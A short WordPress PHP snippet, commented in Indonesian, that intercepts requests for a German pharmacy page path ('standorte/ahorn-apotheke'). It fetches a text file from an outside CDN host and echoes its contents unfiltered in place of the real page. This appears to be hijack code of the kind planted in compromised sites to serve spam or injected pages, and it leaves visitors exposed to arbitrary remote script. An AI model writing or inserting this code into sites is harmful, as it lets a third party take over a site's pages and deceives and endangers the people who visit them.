add_action( 'template_redirect', function () { if ( trim( $_SERVER['REQUEST_URI'], '/' ) === 'standorte/ahorn-apotheke' ) { // Ambil konten dari URL tujuan $remote_html = wp_remote_get( 'https://richard77.b-cdn.net/home/siebleben-ahorn-apotheke.txt' ); if ( is_wp_error( $remote_html ) ) { wp_die( 'Gagal mengambil konten.' ); } $body = wp_remote_retrieve_body( $remote_html ); echo $body; exit; } });